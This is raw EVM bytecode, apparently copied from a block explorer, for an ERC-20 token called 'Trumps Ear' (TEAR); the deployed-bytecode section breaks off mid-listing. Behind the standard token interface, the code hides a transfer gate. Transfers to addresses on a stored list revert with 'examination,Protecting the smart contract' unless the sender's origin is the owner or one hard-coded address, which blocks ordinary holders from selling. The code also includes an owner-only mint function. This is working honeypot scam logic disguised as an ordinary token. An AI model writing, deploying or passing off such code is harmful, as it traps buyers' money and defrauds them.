61016060405234801562000011575f80fd5b5060405162003900380380620039008339818101604052810190620000379190620008bd565b82806040518060400160405280600181526020017f310000000000000000000000000000000000000000000000000000000000000081525085856200009162000085620001ad60201b60201c565b620001b460201b60201c565b8160049081620000a2919062000b82565b508060059081620000b4919062000b82565b505050620000cd6009836200027560201b90919060201c565b6101208181525050620000eb600a826200027560201b90919060201c565b6101408181525050818051906020012060e08181525050808051906020012061010081815250504660a081815250506200012a620002ca60201b60201c565b608081815250503073ffffffffffffffffffffffffffffffffffffffff1660c08173ffffffffffffffffffffffffffffffffffffffff1681525050505050620001a4336200017d6200032660201b60201c565b600a6200018b919062000def565b8362000198919062000e3f565b6200032e60201b60201c565b50505062001232565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6020835110156200029a5762000292836200049260201b60201c565b9050620002c4565b82620002ac83620004fc60201b60201c565b5f019081620002bc919062000b82565b5060ff5f1b90505b92915050565b5f7f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f60e0516101005146306040516020016200030b95949392919062000ef7565b60405160208183030381529060405280519060200120905090565b5f6006905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200039f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003969062000fb0565b60405180910390fd5b620003b0826200050560201b60201c565b8060035f828254620003c3919062000fd0565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200047391906200100a565b60405180910390a36200048e5f83836200052f60201b60201c565b5050565b5f80829050601f81511115620004e157826040517f305a27a9000000000000000000000000000000000000000000000000000000008152600401620004d8919062001065565b60405180910390fd5b805181620004ef90620010b6565b5f1c175f1b915050919050565b5f819050919050565b62000516816200053460201b60201c565b6200052c576200052b620005e560201b60201c565b5b50565b505050565b5f805f90505b600880549050811015620005da578273ffffffffffffffffffffffffffffffffffffffff166008828154811062000576576200057562001125565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603620005c4575f915050620005e0565b8080620005d19062001152565b9150506200053a565b50600190505b919050565b3273ffffffffffffffffffffffffffffffffffffffff166200060c6200067f60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1614806200063b57506200063a620006a660201b60201c565b5b6200067d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006749062001212565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f733ec9c6d838e0e3c960129300bda7bb93cfc374dc73ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1603620006f95760019050620006fd565b5f90505b90565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b620007618262000719565b810181811067ffffffffffffffff8211171562000783576200078262000729565b5b80604052505050565b5f6200079762000700565b9050620007a5828262000756565b919050565b5f67ffffffffffffffff821115620007c757620007c662000729565b5b620007d28262000719565b9050602081019050919050565b5f5b83811015620007fe578082015181840152602081019050620007e1565b5f8484015250505050565b5f6200081f6200081984620007aa565b6200078c565b9050828152602081018484840111156200083e576200083d62000715565b5b6200084b848285620007df565b509392505050565b5f82601f8301126200086a576200086962000711565b5b81516200087c84826020860162000809565b91505092915050565b5f819050919050565b620008998162000885565b8114620008a4575f80fd5b50565b5f81519050620008b7816200088e565b92915050565b5f805f60608486031215620008d757620008d662000709565b5b5f84015167ffffffffffffffff811115620008f757620008f66200070d565b5b620009058682870162000853565b935050602084015167ffffffffffffffff8111156200092957620009286200070d565b5b620009378682870162000853565b92505060406200094a86828701620008a7565b9150509250925092565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620009a357607f821691505b602082108103620009b957620009b86200095e565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830262000a1d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620009e0565b62000a298683620009e0565b95508019841693508086168417925050509392505050565b5f819050919050565b5f62000a6a62000a6462000a5e8462000885565b62000a41565b62000885565b9050919050565b5f819050919050565b62000a858362000a4a565b62000a9d62000a948262000a71565b848454620009ec565b825550505050565b5f90565b62000ab362000aa5565b62000ac081848462000a7a565b505050565b5b8181101562000ae75762000adb5f8262000aa9565b60018101905062000ac6565b5050565b601f82111562000b365762000b0081620009bf565b62000b0b84620009d1565b8101602085101562000b1b578190505b62000b3362000b2a85620009d1565b83018262000ac5565b50505b505050565b5f82821c905092915050565b5f62000b585f198460080262000b3b565b1980831691505092915050565b5f62000b72838362000b47565b9150826002028217905092915050565b62000b8d8262000954565b67ffffffffffffffff81111562000ba95762000ba862000729565b5b62000bb582546200098b565b62000bc282828562000aeb565b5f60209050601f83116001811462000bf8575f841562000be3578287015190505b62000bef858262000b65565b86555062000c5e565b601f19841662000c0886620009bf565b5f5b8281101562000c315784890151825560018201915060208501945060208101905062000c0a565b8683101562000c51578489015162000c4d601f89168262000b47565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000cf05780860481111562000cc85762000cc762000c66565b5b600185161562000cd85780820291505b808102905062000ce88562000c93565b945062000ca8565b94509492505050565b5f8262000d0a576001905062000ddc565b8162000d19575f905062000ddc565b816001811462000d32576002811462000d3d5762000d73565b600191505062000ddc565b60ff84111562000d525762000d5162000c66565b5b8360020a91508482111562000d6c5762000d6b62000c66565b5b5062000ddc565b5060208310610133831016604e8410600b841016171562000dad5782820a90508381111562000da75762000da662000c66565b5b62000ddc565b62000dbc848484600162000c9f565b9250905081840481111562000dd65762000dd562000c66565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000dfb8262000885565b915062000e088362000de3565b925062000e377fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000cf9565b905092915050565b5f62000e4b8262000885565b915062000e588362000885565b925082820262000e688162000885565b9150828204841483151762000e825762000e8162000c66565b5b5092915050565b5f819050919050565b62000e9d8162000e89565b82525050565b62000eae8162000885565b82525050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62000edf8262000eb4565b9050919050565b62000ef18162000ed3565b82525050565b5f60a08201905062000f0c5f83018862000e92565b62000f1b602083018762000e92565b62000f2a604083018662000e92565b62000f39606083018562000ea3565b62000f48608083018462000ee6565b9695505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000f98601f8362000f52565b915062000fa58262000f62565b602082019050919050565b5f6020820190508181035f83015262000fc98162000f8a565b9050919050565b5f62000fdc8262000885565b915062000fe98362000885565b925082820190508082111562001004576200100362000c66565b5b92915050565b5f6020820190506200101f5f83018462000ea3565b92915050565b5f620010318262000954565b6200103d818562000f52565b93506200104f818560208601620007df565b6200105a8162000719565b840191505092915050565b5f6020820190508181035f8301526200107f818462001025565b905092915050565b5f81519050919050565b5f819050602082019050919050565b5f620010ad825162000e89565b80915050919050565b5f620010c28262001087565b82620010ce8462001091565b9050620010db81620010a0565b925060208210156200111e57620011197fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff83602003600802620009e0565b831692505b5050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f6200115e8262000885565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820362001193576200119262000c66565b5b600182019050919050565b7f6578616d696e6174696f6e2c50726f74656374696e672074686520736d6172745f8201527f20636f6e74726163740000000000000000000000000000000000000000000000602082015250565b5f620011fa60298362000f52565b915062001207826200119e565b604082019050919050565b5f6020820190508181035f8301526200122b81620011ec565b9050919050565b60805160a05160c05160e05161010051610120516101405161267c620012845f395f6112fc01525f6112c101525f61148301525f61146201525f6110fe01525f61115401525f61117d015261267c5ff3fe608060405234801561000f575f80fd5b5060043610610135575f3560e01c8063715018a6116100b6578063a457c2d71161007a578063a457c2d714610345578063a9059cbb14610375578063d505accf146103a5578063dd62ed3e146103c1578063f2fde38b146103f1578063f8a8fd6d1461040d57610135565b8063715018a6146102ab5780637ecebe00146102b557806384b0196e146102e55780638da5cb5b1461030957806395d89b411461032757610135565b8063313ce567116100fd578063313ce567146101f15780633644e5151461020f578063395093511461022d5780633ee52f991461025d57806370a082311461027b57610135565b806306fdde0314610139578063072caf6e14610157578063095ea7b31461017357806318160ddd146101a357806323b872dd146101c1575b5f80fd5b61014161042b565b60405161014e91906119fb565b60405180910390f35b610171600480360381019061016c9190611aac565b6104bb565b005b61018d60048036038101906101889190611aac565b6104d1565b60405161019a9190611b04565b60405180910390f35b6101ab6104f3565b6040516101b89190611b2c565b60405180910390f35b6101db60048036038101906101d69190611b45565b6104fc565b6040516101e89190611b04565b60405180910390f35b6101f961052a565b6040516102069190611bb0565b60405180910390f35b610217610532565b6040516102249190611be1565b60405180910390f35b61024760048036038101906102429190611aac565b610540565b6040516102549190611b04565b60405180910390f35b610265610576565b6040516102729190611c09565b60405180910390f35b61029560048036038101906102909190611c22565b61059b565b6040516102a29190611b2c565b60405180910390f35b6102b36105e1565b005b6102cf60048036038101906102ca9190611c22565b6105f4565b6040516102dc9190611b2c565b60405180910390f35b6102ed610605565b6040516103009796959493929190611d3e565b60405180910390f35b6103116106aa565b60405161031e9190611c09565b60405180910390f35b61032f6106d1565b60405161033c91906119fb565b60405180910390f35b61035f600480360381019061035a9190611aac565b610761565b60405161036c9190611b04565b60405180910390f35b61038f600480360381019061038a9190611aac565b6107d6565b60405161039c9190611b04565b60405180910390f35b6103bf60048036038101906103ba9190611e14565b6107f8565b005b6103db60048036038101906103d69190611eb1565b61093d565b6040516103e89190611b2c565b60405180910390f35b61040b60048036038101906104069190611c22565b6109bf565b005b610415610a41565b6040516104229190611c09565b60405180910390f35b60606004805461043a90611f1c565b80601f016020809104026020016040519081016040528092919081815260200182805461046690611f1c565b80156104b15780601f10610488576101008083540402835291602001916104b1565b820191905f5260205f20905b81548152906001019060200180831161049457829003601f168201915b5050505050905090565b6104c3610a66565b6104cd8282610aec565b5050565b5f806104db610c39565b90506104e8818585610c40565b600191505092915050565b5f600354905090565b5f80610506610c39565b9050610513858285610e03565b61051e858585610e8e565b60019150509392505050565b5f6006905090565b5f61053b6110fb565b905090565b5f8061054a610c39565b905061056b81858561055c858961093d565b6105669190611f79565b610c40565b600191505092915050565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105e9610a66565b6105f25f6111b1565b565b5f6105fe82611272565b9050919050565b5f6060805f805f60606106166112b8565b61061e6112f3565b46305f801b5f67ffffffffffffffff81111561063d5761063c611fac565b5b60405190808252806020026020018201604052801561066b5781602001602082028036833780820191505090505b507f0f00000000000000000000000000000000000000000000000000000000000000959493929190965096509650965096509650965090919293949596565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546106e090611f1c565b80601f016020809104026020016040519081016040528092919081815260200182805461070c90611f1c565b80156107575780601f1061072e57610100808354040283529160200191610757565b820191905f5260205f20905b81548152906001019060200180831161073a57829003601f168201915b5050505050905090565b5f8061076b610c39565b90505f610778828661093d565b9050838110156107bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107b490612049565b60405180910390fd5b6107ca8286868403610c40565b60019250505092915050565b5f806107e0610c39565b90506107ed818585610e8e565b600191505092915050565b8342111561083d57836040517f627913020000000000000000000000000000000000000000000000000000000081526004016108349190611b2c565b60405180910390fd5b5f7f6e71edae12b1b97f4d1f60370fef10105fa2faae0126114a169c64845d6126c988888861086b8c61132e565b8960405160200161088196959493929190612067565b6040516020818303038152906040528051906020012090505f6108a382611381565b90505f6108b28287878761139a565b90508973ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161461092657808a6040517f4b800e4600000000000000000000000000000000000000000000000000000000815260040161091d9291906120c6565b60405180910390fd5b6109318a8a8a610c40565b50505050505050505050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6109c7610a66565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2c9061215d565b60405180910390fd5b610a3e816111b1565b50565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3273ffffffffffffffffffffffffffffffffffffffff16610a856106aa565b73ffffffffffffffffffffffffffffffffffffffff161480610aab5750610aaa6113c8565b5b610aea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae19061215d565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b51906121c5565b60405180910390fd5b610b6382611420565b8060035f828254610b749190611f79565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610c229190611b2c565b60405180910390a3610c355f8383611439565b5050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca590612253565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d13906122e1565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610df69190611b2c565b60405180910390a3505050565b5f610e0e848461093d565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e885781811015610e7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e7190612349565b60405180910390fd5b610e878484848403610c40565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610efc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef3906123d7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6190612465565b60405180910390fd5b610f7382611420565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610ff7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fee906124f3565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110e29190611b2c565b60405180910390a36110f5848484611439565b50505050565b5f7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff1614801561117657507f000000000000000000000000000000000000000000000000000000000000000046145b156111a3577f000000000000000000000000000000000000000000000000000000000000000090506111ae565b6111ab61143e565b90505b90565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606112ee60097f00000000000000000000000000000000000000000000000000000000000000006114d390919063ffffffff16565b905090565b6060611329600a7f00000000000000000000000000000000000000000000000000000000000000006114d390919063ffffffff16565b905090565b5f600b5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f815480929190600101919050559050919050565b5f61139361138d6110fb565b83611580565b9050919050565b5f805f806113aa888888886115c0565b9250925092506113ba82826116a7565b829350505050949350505050565b5f733ec9c6d838e0e3c960129300bda7bb93cfc374dc73ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1603611419576001905061141d565b5f90505b90565b61142981611809565b61143657611435610a66565b5b50565b505050565b5f7f8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f7f00000000000000000000000000000000000000000000000000000000000000007f000000000000000000000000000000000000000000000000000000000000000046306040516020016114b8959493929190612511565b60405160208183030381529060405280519060200120905090565b606060ff5f1b83146114ef576114e8836118b1565b905061157a565b8180546114fb90611f1c565b80601f016020809104026020016040519081016040528092919081815260200182805461152790611f1c565b80156115725780601f1061154957610100808354040283529160200191611572565b820191905f5260205f20905b81548152906001019060200180831161155557829003601f168201915b505050505090505b92915050565b5f6040517f190100000000000000000000000000000000000000000000000000000000000081528360028201528260228201526042812091505092915050565b5f805f7f7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0845f1c11156115fc575f60038592509250925061169d565b5f6001888888886040515f815260200160405260405161161f9493929190612562565b6020604051602081039080840390855afa15801561163f573d5f803e3d5ffd5b5050506020604051035190505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611690575f60015f801b9350935093505061169d565b805f805f1b935093509350505b9450945094915050565b5f60038111156116ba576116b96125a5565b5b8260038111156116cd576116cc6125a5565b5b031561180557600160038111156116e7576116e66125a5565b5b8260038111156116fa576116f96125a5565b5b03611731576040517ff645eedf00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60026003811115611745576117446125a5565b5b826003811115611758576117576125a5565b5b0361179c57805f1c6040517ffce698f70000000000000000000000000000000000000000000000000000000081526004016117939190611b2c565b60405180910390fd5b6003808111156117af576117ae6125a5565b5b8260038111156117c2576117c16125a5565b5b0361180457806040517fd78bce0c0000000000000000000000000000000000000000000000000000000081526004016117fb9190611be1565b60405180910390fd5b5b5050565b5f805f90505b6008805490508110156118a6578273ffffffffffffffffffffffffffffffffffffffff1660088281548110611847576118466125d2565b5b905f5260205f20015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603611893575f9150506118ac565b808061189e906125ff565b91505061180f565b50600190505b919050565b60605f6118bd83611923565b90505f602067ffffffffffffffff8111156118db576118da611fac565b5b6040519080825280601f01601f19166020018201604052801561190d5781602001600182028036833780820191505090505b5090508181528360208201528092505050919050565b5f8060ff835f1c169050601f811115611968576040517fb3512b0c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b80915050919050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156119a857808201518184015260208101905061198d565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6119cd82611971565b6119d7818561197b565b93506119e781856020860161198b565b6119f0816119b3565b840191505092915050565b5f6020820190508181035f830152611a1381846119c3565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611a4882611a1f565b9050919050565b611a5881611a3e565b8114611a62575f80fd5b50565b5f81359050611a7381611a4f565b92915050565b5f819050919050565b611a8b81611a79565b8114611a95575f80fd5b50565b5f81359050611aa681611a82565b92915050565b5f8060408385031215611ac257611ac1611a1b565b5b5f611acf85828601611a65565b9250506020611ae085828601611a98565b9150509250929050565b5f8115159050919050565b611afe81611aea565b82525050565b5f602082019050611b175f830184611af5565b92915050565b611b2681611a79565b82525050565b5f602082019050611b3f5f830184611b1d565b92915050565b5f805f60608486031215611b5c57611b5b611a1b565b5b5f611b6986828701611a65565b9350506020611b7a86828701611a65565b9250506040611b8b86828701611a98565b9150509250925092565b5f60ff82169050919050565b611baa81611b95565b82525050565b5f602082019050611bc35f830184611ba1565b92915050565b5f819050919050565b611bdb81611bc9565b82525050565b5f602082019050611bf45f830184611bd2565b92915050565b611c0381611a3e565b82525050565b5f602082019050611c1c5f830184611bfa565b92915050565b5f60208284031215611c3757611c36611a1b565b5b5f611c4484828501611a65565b91505092915050565b5f7fff0000000000000000000000000000000000000000000000000000000000000082169050919050565b611c8181611c4d565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611cb981611a79565b82525050565b5f611cca8383611cb0565b60208301905092915050565b5f602082019050919050565b5f611cec82611c87565b611cf68185611c91565b9350611d0183611ca1565b805f5b83811015611d31578151611d188882611cbf565b9750611d2383611cd6565b925050600181019050611d04565b5085935050505092915050565b5f60e082019050611d515f83018a611c78565b8181036020830152611d6381896119c3565b90508181036040830152611d7781886119c3565b9050611d866060830187611b1d565b611d936080830186611bfa565b611da060a0830185611bd2565b81810360c0830152611db28184611ce2565b905098975050505050505050565b611dc981611b95565b8114611dd3575f80fd5b50565b5f81359050611de481611dc0565b92915050565b611df381611bc9565b8114611dfd575f80fd5b50565b5f81359050611e0e81611dea565b92915050565b5f805f805f805f60e0888a031215611e2f57611e2e611a1b565b5b5f611e3c8a828b01611a65565b9750506020611e4d8a828b01611a65565b9650506040611e5e8a828b01611a98565b9550506060611e6f8a828b01611a98565b9450506080611e808a828b01611dd6565b93505060a0611e918a828b01611e00565b92505060c0611ea28a828b01611e00565b91505092959891949750929550565b5f8060408385031215611ec757611ec6611a1b565b5b5f611ed485828601611a65565b9250506020611ee585828601611a65565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680611f3357607f821691505b602082108103611f4657611f45611eef565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611f8382611a79565b9150611f8e83611a79565b9250828201905080821115611fa657611fa5611f4c565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f61203360258361197b565b915061203e82611fd9565b604082019050919050565b5f6020820190508181035f83015261206081612027565b9050919050565b5f60c08201905061207a5f830189611bd2565b6120876020830188611bfa565b6120946040830187611bfa565b6120a16060830186611b1d565b6120ae6080830185611b1d565b6120bb60a0830184611b1d565b979650505050505050565b5f6040820190506120d95f830185611bfa565b6120e66020830184611bfa565b9392505050565b7f6578616d696e6174696f6e2c50726f74656374696e672074686520736d6172745f8201527f20636f6e74726163740000000000000000000000000000000000000000000000602082015250565b5f61214760298361197b565b9150612152826120ed565b604082019050919050565b5f6020820190508181035f8301526121748161213b565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6121af601f8361197b565b91506121ba8261217b565b602082019050919050565b5f6020820190508181035f8301526121dc816121a3565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61223d60248361197b565b9150612248826121e3565b604082019050919050565b5f6020820190508181035f83015261226a81612231565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6122cb60228361197b565b91506122d682612271565b604082019050919050565b5f6020820190508181035f8301526122f8816122bf565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f612333601d8361197b565b915061233e826122ff565b602082019050919050565b5f6020820190508181035f83015261236081612327565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f6123c160258361197b565b91506123cc82612367565b604082019050919050565b5f6020820190508181035f8301526123ee816123b5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61244f60238361197b565b915061245a826123f5565b604082019050919050565b5f6020820190508181035f83015261247c81612443565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f6124dd60268361197b565b91506124e882612483565b604082019050919050565b5f6020820190508181035f83015261250a816124d1565b9050919050565b5f60a0820190506125245f830188611bd2565b6125316020830187611bd2565b61253e6040830186611bd2565b61254b6060830185611b1d565b6125586080830184611bfa565b9695505050505050565b5f6080820190506125755f830187611bd2565b6125826020830186611ba1565b61258f6040830185611bd2565b61259c6060830184611bd2565b95945050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f61260982611a79565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361263b5761263a611f4c565b5b60018201905091905056fea26469706673582212208c6c5efd5a070f78025e05678ee8a90748cd57ffede4234cc73c72ed24148bd964736f6c63430008140033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000000000000000000000000000000000000005f5e100000000000000000000000000000000000000000000000000000000000000000a5472756d7073204561720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045445415200000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f80fd5b5060043610610135575f3560e01c8063715018a6116100b6578063a457c2d71161007a578063a457c2d714610345578063a9059cbb14610375578063d505accf146103a5578063dd62ed3e146103c1578063f2fde38b146103f1578063f8a8fd6d1461040d57610135565b8063715018a6146102ab5780637ecebe00146102b557806384b0196e146102e55780638da5cb5b1461030957806395d89b411461032757610135565b8063313ce567116100fd578063313ce567146101f15780633644e5151461020f578063395093511461022d5780633ee52f991461025d57806370a082311461027b57610135565b806306fdde0314610139578063072caf6e14610157578063095ea7b31461017357806318160ddd146101a357806323b872dd146101c1575b5f80fd5b61014161042b565b60405161014e91906119fb565b60405180910390f35b610171600480360381019061016c9190611aac565b6104bb565b005b61018d60048036038101906101889190611aac565b6104d1565b60405161019a9190611b04565b60405180910390f35b6101ab6104f3565b6040516101b89190611b2c565b60405180910390f35b6101db60048036038101906101d69190611b45565b6104fc565b6040516101e89190611b04565b60405180910390f35b6101f961052a565b6040516102069190611bb0565b60405180910390f35b610217610532565b6040516102249190611be1565b60405180910390f35b61024760048036038101906102429190611aac565b610540565b6040516102549190611b04565b60405180910390f35b610265610576565b6040516102729190611c09565b60405180910390f35b61029560048036038101906102909190611c22565b61059b565b6040516102a29190611b2c565b60405180910390f35b6102b36105e1565b005b6102cf60048036038101906102ca9190611c22565b6105f4565b6040516102dc9190611b2c565b60405180910390f35b6102ed610605565b6040516103009796959493929190611d3e565b60405180910390f35b6103116106aa565b60405161031e9190611c09565b60405180910390f35b61032f6106d1565b60405161033c91906119fb565b60405180910390f35b61035f600480360381019061035a9190611aac565b610761565b60405161036c9190611b04565b60405180910390f35b61038f600480360381019061038a9190611aac565b6107d6565b60405161039c9190611b04565b60405180910390f35b6103bf60048036038101906103ba9190611e14565b6107f8565b005b6103db60048036038101906103d69190611eb1565b61093d565b6040516103e89190611b2c565b60405180910390f35b61040b60048036038101906104069190611c22565b6109bf565b005b610415610a41565b6040516104229190611c09565b60405180910390f35b60606004805461043a90611f1c565b80601f016020809104026020016040519081016040528092919081815260200182805461046690611f1c565b80156104b15780601f10610488576101008083540402835291602001916104b1565b820191905f5260205f20905b81548152906001019060200180831161049457829003601f168201915b5050505050905090565b6104c3610a66565b6104cd8282610aec565b5050565b5f806104db610c39565b90506104e8818585610c40565b600191505092915050565b5f600354905090565b5f80610506610c39565b9050610513858285610e03565b61051e858585610e8e565b60019150509392505050565b5f6006905090565b5f61053b6110fb565b905090565b5f8061054a610c39565b905061056b81858561055c858961093d565b6105669190611f79565b610c40565b600191505092915050565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105e9610a66565b6105f25f6111b1565b565b5f6105fe82611272565b9050919050565b5f6060805f805f60606106166112b8565b61061e6112